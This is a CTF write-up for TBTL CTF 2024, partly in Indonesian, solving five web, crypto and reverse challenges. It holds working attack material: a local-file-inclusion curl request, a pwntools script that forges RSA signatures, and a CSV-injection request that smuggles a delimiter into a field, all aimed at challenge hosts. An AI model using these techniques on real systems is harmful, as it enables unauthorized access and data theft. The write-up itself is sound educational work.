# TBTL CTF 2024

archive dump chall :  <https://github.com/blockhousetech/TBTL-CTF/tree/master/2024/>

| Chall                                                    | Category | Total Solved |
| -------------------------------------------------------- | -------- | ------------ |
| [#butterfly](#butterfly "mention")                       | Web      |              |
| [#talk-to-you](#talk-to-you "mention")                   | Web      |              |
| [#wikipedia-signatures](#wikipedia-signatures "mention") | Crypto   |              |
| [#flagcheck](#flagcheck "mention")                       | Reverse  |              |
| [#rnd-for-data-science](#rnd-for-data-science "mention") | Web      |              |

## Butterfly

flag from indexed db : U2FsdGVkX19wWL7itIL7TZcLTP/e1ulrZolI9AHTA8OBGOCodbZKdOxPF41rGV9C+X7PZPt9ISJKQMpTl+Fwew==

{"code":"CryptoJS.AES.decrypt(CIPHERTEXT, KEY).toString(CryptoJS.enc.Utf8)"} ( kita dapetin dari session ) kita asumsi bahwa flagnya nanti memakai function ini tinggal cari secretnya

secret ada di session lgsg aja

```javascript
CryptoJS.AES.decrypt('U2FsdGVkX19wWL7itIL7TZcLTP/e1ulrZolI9AHTA8OBGOCodbZKdOxPF41rGV9C+X7PZPt9ISJKQMpTl+Fwew==', 'secret key is very secure').toString(CryptoJS.enc.Utf8)
```

flag : TBTL{th15\_1S\_n0t\_53CUR3\_5T0r4G3}<br>

## Talk to you

lfi on the page , first we use ../flag.txt and the site said the flag in database.sqlite so we change the parameter and we get the flag

```bash
curl "https://tbtl-talk-to-you.chals.io/?page=database.sqlite" --output file
```

TBTL{4Typ1c41\_d4T4B453\_u54g3}

## Wikipedia signatures

The exploits here are always around the fact that you can give texts that have the same modulus with N as the goal

Here however they forbid all payloads of the form pt + a\*N

However we can simply do (N-pt)

As we know that (N-pt)^e = -C (mod N)

So taking -(-C) (mod N) gives us what we need and supplying that decrypts it successfully

```python
from Crypto.Util.number import *
from pwn import *

conn = remote('0.cloud.chals.io', 31148)
conn.recvuntil(b'(')

n = int(conn.recvuntil(b',').decode()[:-1])
print(n)

e = int(conn.recvuntil(b')').decode()[:-1])
print(e)

conn.recvline()
conn.recvline()
conn.recvline()
conn.recvline()

print(conn.recvuntil(b'> '))

TARGET = b'I challenge you to sign this message!'
pt = bytes_to_long(TARGET)

print(pt)

rev_t = n-pt

payload = "2 " + str(rev_t)
print(payload)
conn.sendline(payload.encode())

res = int(conn.recvline().decode().strip("\r\n"))
print(res)

rev_res = n-res
print(rev_res)

payload = "1 " + str(rev_res)
print(payload)
conn.sendline(payload.encode())
print(conn.recvall())

conn.close()
```

TBTL{r3p347\_4f73r\_m3-d16174l\_516n47ur3\_15\_n07\_3ncryp710n}

## Flagcheck

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

unsigned char dt[] = {0x33,0x00,0x00,0x00,0x84,0x00,0x00,0x00,0x3d,0x00,0x00,0x00,0x3f,0x00,0x00,0x00,0x2a,0x00,0x00,0x00,0x93,0x00,0x00,0x00,0x7b,0x00,0x00,0x00,0x82,0x00,0x00,0x00,0x1a,0x00,0x00,0x00,0xac,0x00,0x00,0x00,0x8e,0x00,0x00,0x00,0xf4,0x00,0x00,0x00,0xb1,0x00,0x00,0x00,0xcb,0x00,0x00,0x00,0x8d,0x00,0x00,0x00,0x21,0x00,0x00,0x00,0x0e,0x00,0x00,0x00,0xb7,0x00,0x00,0x00,0x67,0x00,0x00,0x00,0x96,0x00,0x00,0x00,0x2c,0x00,0x00,0x00,0x81,0x00,0x00,0x00,0xd3,0x00,0x00,0x00,0xbc,0x00,0x00,0x00,0x29,0x00,0x00,0x00,0x6c,0x00,0x00,0x00,0x4b,0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xed,0x00,0x00,0x00,0xfd,0x00,0x00,0x00,0xee,0x00,0x00,0x00,0x56,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x52,0x00,0x00,0x00,0xd5,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x6d,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x3e,0x00,0x00,0x00,0x7a,0x00,0x00,0x00,0x1b,0x00,0x00,0x00,0x69,0x00,0x00,0x00,0x23,0x00,0x00,0x00,0x1f,0x00,0x00,0x00,0xb6,0x00,0x00,0x00,0x1d,0x00,0x00,0x00,0xbc,0x00,0x00,0x00,0x98,0x00,0x00,0x00,0xd1,0x00,0x00,0x00,0xa6,0x00,0x00,0x00,0x83,0x00,0x00,0x00,0xe9,0x00,0x00,0x00,0xeb,0x00,0x00,0x00,0x13,0x00,0x00,0x00,0x21,0x00,0x00,0x00,0x3d,0x00,0x00,0x00,0xf8,0x00,0x00,0x00,0x2b,0x00,0x00,0x00,0x79,0x00,0x00,0x00,0x53,0x00,0x00,0x00,0x4f,0x00,0x00,0x00,0xa1,0x00,0x00,0x00};

int main() {
    srand(time(NULL));
    for (int x = 0; x < 255; x++) {
        srand(x);
        char tmp[64] = {0};
        for (int i = 0; i < 0x3f; i++) {
            tmp[i] = dt[i*4] ^ (rand() % 0x100);
        }
        if (strstr(tmp, "TBTL") != NULL) {
            printf("%s\n", tmp);
            break;
        }
    }
    return 0;
}
```

## Rnd For Data Science

csv injection payload: ,delimiter,#&#x20;

```bash
POST /generate HTTP/1.1
Host: tbtl-rnd-for-data-science.chals.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: https://tbtl-rnd-for-data-science.chals.io
Referer: https://tbtl-rnd-for-data-science.chals.io/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

numColumns=3&columnName0=%2cdelimiter%2c%23&columnName1=b&columnName2=c&delimiter=%20
```

TBTL{d4T4\_5c13nc3\_15\_n07\_f0r\_r0ck135}